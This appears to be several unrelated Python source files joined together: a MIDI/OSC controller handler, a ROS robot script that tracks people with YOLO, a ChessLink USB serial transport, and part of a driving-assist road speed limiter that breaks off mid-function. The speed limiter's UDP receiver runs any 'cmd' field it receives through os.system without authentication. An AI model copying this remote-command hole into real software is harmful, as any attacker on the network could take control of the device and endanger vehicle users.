def NoteOff(note):
global MidInsNumber
gstt.note = note
gstt.velocity = 0
for port in range(MidInsNumber):
if midiname[port].find(LaunchMidiName) == 0:
launchpad.PadNoteOff(note%64)
if midiname[port].find(BhorealMidiName) == 0:
midiport[port].send_message([NOTE_OFF, note%64, 0])
gstt.BhorLeds[note%64]=0
#bhorosc.sendosc("/bhoreal", [note%64 , 0])
if midiname[port].find(BhorealMidiName) != 0 and midiname[port].find(LaunchMidiName) != 0:
midiport[port].send_message([NOTE_OFF, note, 0])
#virtual.send_message([NOTE_OFF, note, 0])
for OSCtarget in midi2OSC:
if midi2OSC[OSCtarget]["notes"]:
pass
#OSCsend(OSCtarget, "/noteoff", note)
def MidiMsg(midimsg):
print ("MidiMsg", midimsg)
for port in range(MidInsNumber):
if midiname[port].find(BhorealMidiName) != 0:
midiport[port].send_message(midimsg)
def OSCsend(name, oscaddress, oscargs =''):
ip = midi2OSC[name]["oscip"]
port = midi2OSC[name]["oscport"]
osclient = OSCClient()
osclient.connect((ip, port))
oscmsg = OSCMessage()
oscmsg.setAddress(oscaddress)
oscmsg.append(oscargs)
try:
if gstt.debug > 0:
print("Midi OSCSend : sending", oscmsg, "to", name, "at", gstt.LjayServerIP, ":", PluginPort)
osclient.sendto(oscmsg, (ip, port))
oscmsg.clearData()
#if gstt.debug >0:
# print oscaddress, oscargs, "was sent to",name
return True
except:
if gstt.debug > 0:
print ('Midi OSCSend : Connection to IP', ip ,':', port,'refused : died ?')
#sendWSall("/status No plugin.")
#sendWSall("/status " + name + " is offline")
#sendWSall("/" + name + "/start 0")
#PluginStart(name)
return False
def WebStatus(message):
OSCsend("lj","/status", message)
#
# MIDI Startup and handling
#
mqueue = Queue()
inqueue = Queue()
#
# Events from Generic MIDI Handling
#
def midinProcess(midiqueue):
midiqueue_get = midiqueue.get
while True:
msg = midiqueue_get()
print ("midin ", msg)
time.sleep(0.001)
# Event from Bhoreal or Launchpad
def MidinProcess(inqueue):
inqueue_get = inqueue.get
while True:
time.sleep(0.001)
msg = inqueue_get()
print ("Midinproces", msg[0])
# Note On
if msg[0]==NOTE_ON:
NoteOn(msg[1],msg[2])
#if bhorosc.oscdevice == 1:
WebStatus(''.join(("note ",msg[1]," to ",msg[2])))
# Note Off
if msg[0]==NOTE_OFF:
print ("noteoff")
NoteOff(msg[1],msg[2])
#if bhorosc.oscdevice == 1:
WebStatus(''.join(("note ",msg[1]," to ",msg[2])))
# Midi CC message
if msg[0] == CONTROLLER_CHANGE:
print ("CC :", msg[1], msg[2])
WebStatus("CC :" + str(msg[1]) + " " + str(msg[2]))
#orbits.RotX(msg[2])
for OSCtarget in midi2OSC:
if OSCtarget["notes"]:
pass
#OSCsend(OSCtarget, "/CC", note)
# other midi message
if msg[0] != NOTE_OFF and msg[0] != NOTE_ON:
MidiMsg(msg[0],msg[1],msg[2])
#if bhorosc.oscdevice == 1:
WebStatus(''.join(("msg : ",msg[0]," ",msg[1]," ",msg[2])))
# Generic call back : new msg forwarded to queue
class AddQueue(object):
def __init__(self, port):
self.port = port
print ("AddQueue", port)
self._wallclock = time.time()
def __call__(self, event, data=None):
message, deltatime = event
self._wallclock += deltatime
print("[%s] @%0.6f %r" % (self.port, self._wallclock, message))
inqueue.put(message)
#
# MIDI OUT Handling
#
def OutConfig():
global midiout, MidInsNumber
print("")
print("MIDIout...")
print("List and attach to available devices on host with IN port :")
# Display list of available midi IN devices on the host, create and start an OUT instance to talk to each of these Midi IN devices
midiout = rtmidi.MidiOut()
available_ports = midiout.get_ports()
for port, name in enumerate(available_ports):
midiname[port]=name
midiport[port].open_port(port)
print("Will send to [%i] %s" % (port, name))
#MidIns[port][1].open_port(port)
# Search for a Bhoreal
if name.find(BhorealMidiName) == 0:
print("Bhoreal start animation")
gstt.BhorealHere = port
bhoreal.StartBhoreal(port)
bhoreal.UpdateCurve()
bhoreal.UpdateSet()
bhoreal.UpdateLaser()
bhoreal.UpdateSimu()
time.sleep(0.2)
# Search for a LaunchPad
if name.find(LaunchMidiName) == 0:
print("Launchpad mini start animation")
gstt.LaunchHere = port
print(gstt.LaunchHere)
launchpad.StartLaunchPad(port)
time.sleep(0.2)
# Search for a Guitar Wing
if name.find("Livid") == 0:
print("Livid Guitar Wing start animation")
gstt.WingHere = port
print(gstt.WingHere)
#guitarwing.StartWing(port)
time.sleep(0.2)
print ("")
MidInsNumber = port+1
#
# MIDI IN Handling
# Create processing thread and queue for each device
#
def InConfig():
print("")
print("MIDIin...")
print("List and attach to available devices on host with OUT port :")
if platform == 'darwin':
mido.set_backend('mido.backends.rtmidi/MACOSX_CORE')
for port, name in enumerate(mido.get_input_names()):
#print (name)
midinputsname[port]=name
print(port,name)
# Bhoreal found ?
if name.find(BhorealMidiName) == 0:
# thread launch to handle all queued MIDI messages from Bhoreal device
thread = Thread(target=bhoreal.MidinProcess, args=(bhoreal.bhorqueue,))
thread.setDaemon(True)
thread.start()
try:
bhorealin, port_name = open_midiinput(port+1) # weird rtmidi call port number is not the same in mido enumeration and here
except (EOFError, KeyboardInterrupt):
sys.exit()
midinputs.append(bhorealin)
print("Attaching MIDI in callback handler to Bhoreal : ", name)
midinputs[port].set_callback(bhoreal.AddQueue(name))
print("Bhor",port,port_name)
# LaunchPad Mini Found ?
if name.find(LaunchMidiName) == 0:
# thread launch to handle all queued MIDI messages from LauchPad device
thread = Thread(target=launchpad.LaunchMidinProcess, args=(launchpad.launchqueue,))
thread.setDaemon(True)
thread.start()
try:
launchin, port_name = open_midiinput(port+1) # weird port number is not the same in mido enumeration and here
except (EOFError, KeyboardInterrupt):
sys.exit()
midinputs.append(launchin)
print ("Attaching MIDI in callback handler to Launchpad : ", name)
launchin.set_callback(launchpad.LaunchAddQueue(name))
#print "Launch",port,port_name
# all other devices
'''
port = mido.open_ioport(name,callback=AddQueue(name))
This doesn't work on OS X on French system "Réseau Session" has a bug with accent.
Todo : stop using different midi framework.
if name.find(BhorealMidiName) != 0 and name.find(LaunchMidiName) != 0:
thread = Thread(target=midinProcess, args=(midinputsqueue[port],))
thread.setDaemon(True)
thread.start()
try:
port = mido.open_ioport(name,callback=AddQueue(name))
#port_port, port_name = open_midiinput(port)
except (EOFError, KeyboardInterrupt):
sys.exit()
#midinputs.append(port_port)
print "Attaching MIDI in callback handler to : ", name
#midinputs[port].set_callback(AddQueue(name))
#MIDInport = mido.open_ioport("Laser",virtual=True,callback=MIDIn)
'''
if name.find(BhorealMidiName) != 0 and name.find(LaunchMidiName) != 0:
thread = Thread(target=midinProcess, args=(midinputsqueue[port],))
thread.setDaemon(True)
thread.start()
try:
port_port, port_name = open_midiinput(port)
except (EOFError, KeyboardInterrupt):
sys.exit()
midinputs.append(port_port)
print("Attaching MIDI in callback handler to : ", name)
midinputs[port].set_callback(AddQueue(name))
#MIDInport = mido.open_ioport("Laser",virtual=True,callback=MIDIn)
def End():
global midiout
#midiin.close_port()
midiout.close_port()
#del virtual
if gstt.LaunchHere != -1:
del gstt.LaunchHere
if gstt.BhorealHere != -1:
del gstt.BhorealHere
def listdevice(number):
return midiname[number]
def check():
InConfig()
OutConfig()
#return listdevice(255)
|
bulldog_vision_10.py
|
#!/usr/bin/env python3
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
import actionlib
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import Float64
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
from tf_conversions import transformations
import tf
import os, sys
from sensor_msgs.msg import Joy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from tf.transformations import *
from math import pi
from geometry_msgs.msg import PoseStamped
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped,PoseStamped,Twist
from std_msgs.msg import Header
from sensor_msgs.msg import JointState
from threading import Thread
import threading
# 回调函数,获取机器人 motor1 的joint sate
def RV2_motorjointstate_callback(data):
global RV2_motor1_joint
RV2_motor1_joint = data.position[0]
def active_cb(extra):
rospy.loginfo("Goal pose being processed")
def feedback_cb(feedback):
rospy.loginfo("Current location: "+str(feedback))
def done_cb(status, result):
if status == 3:
rospy.loginfo("Goal reached")
if status == 2 or status == 8:
rospy.loginfo("Goal cancelled")
if status == 4:
rospy.loginfo("Goal aborted")
# 回调函数,cvbridge获取中间相机的RGB图像
def ReceiveVideo_mid(data):
global cv_image, bridge
cv_image = bridge.compressed_imgmsg_to_cv2(data, 'bgr8')
# yolo目标识别程序,并返回当前识别结果,是否有人以及人的距离
def object_recognize():
global delta_person, cv_image, label_list, person_count_total
fps = 0
count_period = 3 # 目标检测计数周期
person_stay_count = 0
person_count_total = 0
t_start = time.time()
yolo = YOLO()
time.sleep(1)
while not rospy.is_shutdown():
# 读取某一帧
frame = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
# 转变成Image
frame = pilimage.fromarray(np.uint8(frame))
# 进行检测
frame, bbox_list, label_list = yolo.detect_image(frame)
frame = np.array(frame)
# RGBtoBGR满足opencv显示格式
frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)
# fps = ( fps + (1./(time.time()-t_start)) ) / 2
# print("fps= %.2f"%(fps))
# frame = cv2.putText(frame, "fps= %.2f"%(fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
# print(frame.shape)
cv2.imshow("video",frame)
cv2.waitKey(3)
if type(label_list) != int: # 没检测到物体的时候,bbox_list和label_list为1
num_of_obj = len(label_list)
#确定跟踪物体与图像中点的相对坐标
for i in range(num_of_obj):
if 'person' in label_list[i]:
person_stay_count = person_stay_count + 1
object_center = (bbox_list[i][1]+bbox_list[i][3])*0.5
delta_person = 320-object_center
else:
print('yolo未识别到任何物体')
# 每一 period 重新计时,识别目标计数person_stay_count归零, 同时将前一计时周期内识别到人的置信计数存储到person_stay_count
if time.time() - t_start > count_period:
t_start = time.time()
person_count_total = person_stay_count
person_stay_count = 0
else:
pass
print (label_list, t_start, 'person_stay_count:', person_stay_count, 'person_count_total:', person_count_total) # for debug
os._exit()
def motor1_move():
time.sleep(1)
global command_vel_pub_m, delta_person, RV2_motor1_joint, label_list
delta_person = 0
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "motor1_link"
motor_vel.name = ["motor1"]
while not rospy.is_shutdown():
# print('delta_person:', delta_person) # for debug
#中间位置判断
if -1.5 < RV2_motor1_joint < 1.5:
#左转判断条件
if delta_person > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_person < 200:
motor_vel.velocity = [(delta_person - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_person < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_person < -80:
motor_vel.velocity = [(delta_person + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_person < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
#左限位判断条件
if 1.5 < RV2_motor1_joint:
#左转判断条件
if delta_person > 80:
motor_vel.velocity = [0]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_person < -200:
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_person < -80:
motor_vel.velocity = [(delta_person + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_person < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
#右限位判断条件
if RV2_motor1_joint < -1.5:
#左转判断条件
if delta_person > 200:
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_person < 200:
motor_vel.velocity = [(delta_person - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#右转判断条件
elif delta_person < -80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
#停止判断条件
elif -80 < delta_person < 80:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
else:
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
# 底盘运动程序
def base_move():
global person_count_total, trans, rot, tf_listener
flag_on_mainroad = True
person_stay_threshold = 2 # 参数阈值,判断周期内识别到人的次数的界定值
try:
(trans, rot) = tf_listener.lookupTransform('/map', '/base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo("tf Error")
while not rospy.is_shutdown():
# 如果人在镜头中出现一定时间,并且机器人当前在主路中央,执行靠边运动
if person_count_total > person_stay_threshold and flag_on_mainroad:
try:
(trans, rot) = tf_listener.lookupTransform('/map', '/base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo("tf Error")
print('flag', flag_on_mainroad)
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = trans[0] + 0.2
goal.target_pose.pose.position.y = trans[1]
goal.target_pose.pose.position.z = 0
goal.target_pose.pose.orientation.x = 0
goal.target_pose.pose.orientation.y = 0
goal.target_pose.pose.orientation.z = rot[2]
goal.target_pose.pose.orientation.w = rot[3]
flag_on_mainroad = False
print('flag', flag_on_mainroad)
print(goal)
navclient.send_goal(goal,done_cb)
finished = navclient.wait_for_result()
# flag_on_mainroad = False
# 如果人不在镜头中一段时间,并且机器人不在路中央(已执行靠边),回归主路
elif person_count_total < person_stay_threshold and not(flag_on_mainroad):
try:
(trans, rot) = tf_listener.lookupTransform('/map', '/base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo("tf Error")
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = trans[0] + 0.5
goal.target_pose.pose.position.y = trans[1] + 0.5
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
navclient.send_goal(goal)
flag_on_mainroad = True
# 如果人在镜头中出现一段时间,并且机器人不在路中央(已执行靠边),pass等待
elif person_count_total > person_stay_threshold and not(flag_on_mainroad):
pass
time.sleep(0.2)
def Goal():
global label_list, trans, rot, tf_listener
print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = 0.3
goal.target_pose.pose.position.y = 0
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
navclient.send_goal(goal,done_cb,active_cb, feedback_cb)
finished = navclient.wait_for_result()
if not finished:
rospy.logerr("Action server not available!")
else:
rospy.loginfo ( navclient.get_result())
if __name__ == '__main__':
try:
# 初始化ros节点
rospy.init_node("vision_based_move")
rospy.loginfo("Starting vision based move node")
global command_vel_pub_m, delta_person, trans, rot, tf_listener, navclient, bridge, RV2_motor1_joint
# 发布电机速度
command_vel_pub_m = rospy.Publisher('/motor_control/input/velocity', JointState, queue_size = 100, latch=True)
# 订阅躯干点电机位置信息
rospy.Subscriber('/joint_states_motor', JointState, RV2_motorjointstate_callback)
# 订阅相机图像
rospy.Subscriber('/mid_camera/color/image_raw/compressed', CompressedImage, ReceiveVideo_mid)
# 实例化tf订阅, cv bridge
tf_listener = tf.TransformListener()
bridge = CvBridge()
# 底盘导航 action启动
navclient = actionlib.SimpleActionClient('move_base',MoveBaseAction)
navclient.wait_for_server()
# 定义yolo识别子程序
t_object_recognize = threading.Thread(target = object_recognize)
t_object_recognize.start()
# # 定义躯干运动子进程
t_motor1 = threading.Thread(target = motor1_move)
t_motor1.start()
# 定义底盘运动子进程
t_base = threading.Thread(target = base_move)
t_base.start()
# t_goal = threading.Thread(target = Goal)
# t_goal.start()
# t_goal = threading.Thread(target = Goal_test)
# t_goal.start()
except KeyboardInterrupt:
print("Shutting down cv_bridge_test node.")
cv2.destroyAllWindows()
sys.exit()
|
chess_link_usb.py
|
"""
ChessLink transport implementation for USB connections.
"""
import logging
import threading
import time
import chess_link_protocol as clp
try:
import serial
import serial.tools.list_ports
usb_support = True
except ImportError:
usb_support = False
class Transport():
"""
ChessLink transport implementation for USB connections.
This class does automatic hardware detection of any ChessLink board connected
via USB and support Linux, macOS and Windows.
This transport uses an asynchronous background thread for hardware communcation.
All replies are written to the python queue `que` given during initialization.
"""
def __init__(self, que, protocol_dbg=False):
"""
Initialize with python queue for event handling.
Events are strings conforming to the ChessLink protocol as documented in
`magic-link.md <https://github.com/domschl/python-mchess/blob/master/mchess/magic-board.md>`_.
:param que: Python queue that will eceive events from chess board.
:param protocol_dbg: True: byte-level ChessLink protocol debug messages
"""
self.log = logging.getLogger("ChessLinkUSB")
if usb_support is False:
self.log.error(
'Cannot communicate: PySerial module not installed.')
self.init = False
return
self.que = que # asyncio.Queue()
self.init = True
self.log.debug("USB init ok")
self.protocol_debug = protocol_dbg
self.last_agent_state = None
self.error_state = False
self.thread_active = False
self.event_thread = None
self.usb_dev = None
self.uport = None
def quit(self):
"""
Initiate worker-thread stop
"""
self.thread_active = False
def search_board(self, iface=None):
"""
Search for ChessLink connections on all USB ports.
:param iface: not used for USB.
:returns: Name of the port with a ChessLink board, None on failure.
"""
self.log.info("Searching for ChessLink boards...")
self.log.info('Note: search can be disabled in < chess_link_config.json >' \
' by setting {"autodetect": false}')
port = None
ports = self.usb_port_search()
if len(ports) > 0:
if len(ports) > 1:
self.log.warning(f"Found {len(ports)} Millennium boards, using first found.")
port = ports[0]
self.log.info(f"Autodetected Millennium board at USB port: {port}")
return port
def test_board(self, port):
"""
Test an usb port for correct answer on get version command.
:returns: Version string on ok, None on failure.
"""
self.log.debug(f"Testing port: {port}")
try:
self.usb_dev = serial.Serial(port, 38400, timeout=2)
self.usb_dev.dtr = 0
self.write_mt("V")
version = self.usb_read_synchr(self.usb_dev, 'v', 7)
if len(version) != 7:
self.usb_dev.close()
self.log.debug(f"Message length {len(version)} instead of 7")
return None
if version[0] != 'v':
self.log.debug(f"Unexpected reply {version}")
self.usb_dev.close()
return None
verstring = f'{version[1]+version[2]}.{version[3]+version[4]}'
self.log.debug(f"Millennium {verstring} at {port}")
self.usb_dev.close()
return verstring
except (OSError, serial.SerialException) as e:
self.log.debug(f'Board detection on {port} resulted in error {e}')
try:
self.usb_dev.close()
except Exception:
pass
return None
def usb_port_check(self, port):
"""
Check usb port for valid ChessLink connection
:returns: True on success, False on failure.
"""
self.log.debug(f"Testing port: {port}")
try:
s = serial.Serial(port, 38400)
s.close()
return True
except (OSError, serial.SerialException) as e:
self.log.debug(f"Can't open port {port}, {e}")
return False
def usb_port_search(self):
"""
Get a list of all usb ports that have a connected ChessLink board.
:returns: array of usb port names with valid ChessLink boards, an empty array
if none is found.
"""
ports = list([port.device for port in serial.tools.list_ports.comports(True)])
vports = []
for port in ports:
if self.usb_port_check(port):
version = self.test_board(port)
if version is not None:
self.log.debug(f"Found board at: {port}")
vports.append(port)
break # only one port necessary
return vports
def write_mt(self, msg):
"""
Encode and write a message to ChessLink.
:param msg: Message string. Parity will be added, and block CRC appended.
"""
msg = clp.add_block_crc(msg)
bts = []
for c in msg:
bo = clp.add_odd_par(c)
bts.append(bo)
try:
if self.protocol_debug is True:
self.log.debug(f'Trying write <{bts}>')
self.usb_dev.write(bts)
self.usb_dev.flush()
except Exception as e:
self.log.error(f"Failed to write {msg}: {e}")
self.error_state = True
return False
if self.protocol_debug is True:
self.log.debug(f"Written '{msg}' as < {bts} > ok")
return True
def usb_read_synchr(self, usbdev, cmd, num):
"""
Synchronous reads for initial hardware detection.
"""
rep = []
start = False
while start is False:
try:
b = chr(ord(usbdev.read()) & 127)
except Exception as e:
self.log.debug("USB read failed: {e}")
return []
if b == cmd:
rep.append(b)
start = True
for _ in range(num-1):
try:
b = chr(ord(usbdev.read()) & 127)
rep.append(b)
except (Exception) as e:
self.log.error(f"Read error {e}")
break
if clp.check_block_crc(rep) is False:
return []
return rep
def agent_state(self, que, state, msg):
if state != self.last_agent_state:
self.last_agent_state = state
que.put('agent-state: '+state + ' ' + msg)
def open_mt(self, port):
"""
Open an usb port to a connected ChessLink board.
:returns: True on success.
"""
self.uport = port
try:
self.usb_dev = serial.Serial(port, 38400, timeout=0.1)
self.usb_dev.dtr = 0
except Exception as e:
emsg = f'USB cannot open port {port}, {e}'
self.log.error(emsg)
self.agent_state(self.que, 'offline', emsg)
return False
self.log.debug(f'USB port {port} open')
self.thread_active = True
self.event_thread = threading.Thread(
target=self.event_worker_thread, args=(self.que,))
self.event_thread.setDaemon(True)
self.event_thread.start()
return True
def event_worker_thread(self, que):
"""
Background thread that sends data received via usb to the queue `que`.
"""
self.log.debug('USB worker thread started.')
cmd_started = False
cmd_size = 0
cmd = ""
self.agent_state(self.que, 'online', f'Connected to {self.uport}')
self.error_state = False
posted = False
while self.thread_active:
while self.error_state is True:
time.sleep(1.0)
try:
self.usb_dev.close()
except Exception as e:
self.log.debug('Failed to close usb: {e}')
try:
self.usb_dev = serial.Serial(
self.uport, 38400, timeout=0.1)
self.usb_dev.dtr = 0
self.agent_state(self.que, 'online', f'Reconnected to {self.uport}')
self.error_state = False
posted = False
break
except Exception as e:
if posted is False:
emsg = f"Failed to reconnected to {self.uport}, {e}"
self.log.warning(emsg)
self.agent_state(self.que, 'offline', emsg)
posted = True
b = ""
try:
if cmd_started is False:
self.usb_dev.timeout = None
else:
self.usb_dev.timeout = 0.2
by = self.usb_dev.read()
if len(by) > 0:
b = chr(ord(by) & 127)
else:
continue
except Exception as e:
if len(cmd) > 0:
self.log.debug(f"USB command '{cmd[0]}' interrupted: {e}")
time.sleep(0.1)
cmd_started = False
cmd_size = 0
cmd = ""
self.error_state = True
continue
if len(b) > 0:
if cmd_started is False:
if b in clp.protocol_replies:
cmd_started = True
cmd_size = clp.protocol_replies[b]
cmd = b
cmd_size -= 1
else:
cmd += b
cmd_size -= 1
if cmd_size == 0:
cmd_started = False
cmd_size = 0
if self.protocol_debug is True:
self.log.debug(f"USB received cmd: {cmd}")
if clp.check_block_crc(cmd):
que.put(cmd)
cmd = ""
def get_name(self):
"""
Get name of this transport.
:returns: 'chess_link_usb'
"""
return "chess_link_usb"
def is_init(self):
"""
Check, if hardware connection is up.
:returns: True on success.
"""
self.log.debug("Ask for init")
return self.init
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.numpy_fast import clip
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
# gps = Thread(target=self.gps_thread, args=[])
# gps.setDaemon(True)
# gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def send_sdp(self, sock):
try:
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
ret = False
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
ret = False
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.send_sdp(sock)
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.started_dist = 0
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
if cam_type == 22: # speed bump
MIN_LIMIT = 10
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
#cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
starting_dist = v_ego * 30.
if cam_type == 22:
safe_dist = v_ego * 3.
else:
safe_dist = v_ego * 6.
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
if not self.slowing_down:
self.started_dist = cam_limit_speed_left_dist
self.slowing_down = True
